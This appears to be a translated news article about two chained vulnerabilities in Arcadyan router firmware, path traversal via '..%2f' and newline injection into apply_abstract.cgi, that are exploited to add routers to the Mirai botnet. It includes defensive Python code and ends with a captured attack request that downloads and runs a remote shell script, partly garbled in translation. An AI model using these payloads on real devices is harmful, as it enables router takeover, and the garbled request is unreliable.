Vulnerability in home routers affecting 17 manufacturers

A large-scale attack has been recorded on the network against home routers whose firmware uses an HTTP server implementation from the company Arcadyan. To gain control of the devices, a combination of two vulnerabilities is used that allows remote execution of arbitrary code with root privileges. The problem affects a range of ADSL routers from Arcadyan, ASUS and Buffalo, as well as devices supplied under the brands of Beeline (the problem is confirmed in the Smart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone and other telecom operators. It is noted that the problem has been present in Arcadyan firmware for more than 10 years and over that time has managed to migrate to 20 device models from 17 different manufacturers.

The first vulnerability, CVE-2021-20090, makes it possible to access any script of the web interface without authentication. The essence of the vulnerability is that in the web interface some directories, through which images, CSS files and JavaScript scripts are served, are accessible without authentication. The directories for which unauthenticated access is allowed are checked using an initial mask, that is, by matching the start of the requested path. Specifying "../" in a path to move to the parent directory is blocked by the firmware, but the "..%2f" combination is let through. As a result, protected pages can be opened by sending requests such as "http://192.168.1.1/images/..%2findex.htm".

The second vulnerability, CVE-2021-20091, allows an authenticated user to change the device's system settings by sending specially crafted parameters to the apply_abstract.cgi script, which does not check for the presence of a newline character in the parameters. For example, when performing a ping operation, an attacker can specify the value "192.168.1.2%0AARC_SYS_TelnetdEnable=1" in the field for the IP address to be checked, and the script, when generating the settings file /tmp/etc/config/.glbcfg, will write the line "AARC_SYS_TelnetdEnable=1" into it, which enables the telnetd server, which in turn provides access to an unrestricted command shell with root privileges. Similarly, by setting the AARC_SYS parameter, any code can be executed on the system. The first vulnerability makes it possible to run the problematic script without authentication by accessing it as "/images/..%2fapply_abstract.cgi".
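
The two flaws described above, modelled as an added example (this is not Arcadyan's firmware code and not code from the original article): a prefix check applied before URL decoding, next to a version that decodes and normalizes first, and a settings-line writer that refuses control characters. The list of public prefixes and the key name PING_TARGET are assumptions made for illustration.

```python
import posixpath
from urllib.parse import unquote

# Assumption: directories the web UI serves without a login.
PUBLIC_PREFIXES = ("/images/", "/css/", "/js/")

def naive_is_public(raw_path):
    """Model of the flawed check: literal "../" is refused, then the
    still-encoded path is matched against the public prefixes."""
    if "../" in raw_path:
        return False
    return raw_path.startswith(PUBLIC_PREFIXES)

def resolve(raw_path):
    """Path the server ends up serving once it decodes the request."""
    return posixpath.normpath(unquote(raw_path))

def hardened_is_public(raw_path):
    """Decode and normalize first, so the prefix check sees the same
    path that will be served; anything ambiguous needs a login."""
    decoded = unquote(raw_path)
    if unquote(decoded) != decoded:        # double-encoded, e.g. %252f
        return False
    if "\x00" in decoded or "\\" in decoded:
        return False
    return posixpath.normpath(decoded).startswith(PUBLIC_PREFIXES)

def safe_config_line(key, value):
    """Build one key=value settings line; a value carrying CR, LF or
    another control character would start a line of its own."""
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in value):
        raise ValueError("control character in config value")
    return f"{key}={value}\n"

if __name__ == "__main__":
    # Constructed sample requests, using the paths quoted above.
    for p in ("/images/logo.png", "/images/../index.htm",
              "/images/..%2findex.htm", "/images/..%2fapply_abstract.cgi"):
        print(f"{p:36} naive={naive_is_public(p)!s:5} "
              f"hardened={hardened_is_public(p)!s:5} serves={resolve(p)}")
    # PING_TARGET is a hypothetical key name for the ping address field.
    print(repr(safe_config_line("PING_TARGET", "192.168.1.2")))
    try:
        safe_config_line("PING_TARGET",
                         unquote("192.168.1.2%0AARC_SYS_TelnetdEnable=1"))
    except ValueError as exc:
        print("rejected:", exc)
```

The same two checks are useful as log-review rules: an encoded "..%2f" in a path under an unauthenticated directory, and "%0A" or "%0D" inside a form parameter, are both worth alerting on.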

To exploit the vulnerabilities, an attacker must be able to send a request to the network port on which the web interface runs. Judging by the dynamics of the attack's spread, many operators leave access to their devices open from the external network to simplify the diagnosis of problems by the support service. If access to the interface is limited to the internal network only, the attack can be carried out from the external network using the "DNS rebinding" technique. The vulnerabilities are already being used to connect routers to the Mirai botnet:

    POST /images/..%2fapply_abstract.cgi HTTP/1.1
    Connection: close
    User-Agent: Dark

    action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC=212.192.241.7_ipad0 1%0A ARC_SYS_TelnetdEnable=212.192.241.72&%212.192.241.72AARC_SYS_=cd+/tmp; wget+http://777/lolol.sh; curl+-O+http://0/lolol.sh; chmod+4+lolol.sh; sh+lolol.sh&ARC_ping_status=XNUMX&TMP_Ping_Type=XNUMX

Source: opennet.ru
